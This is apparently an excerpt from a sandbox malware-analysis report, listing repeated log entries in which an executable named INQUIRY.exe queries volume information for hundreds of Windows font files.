                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
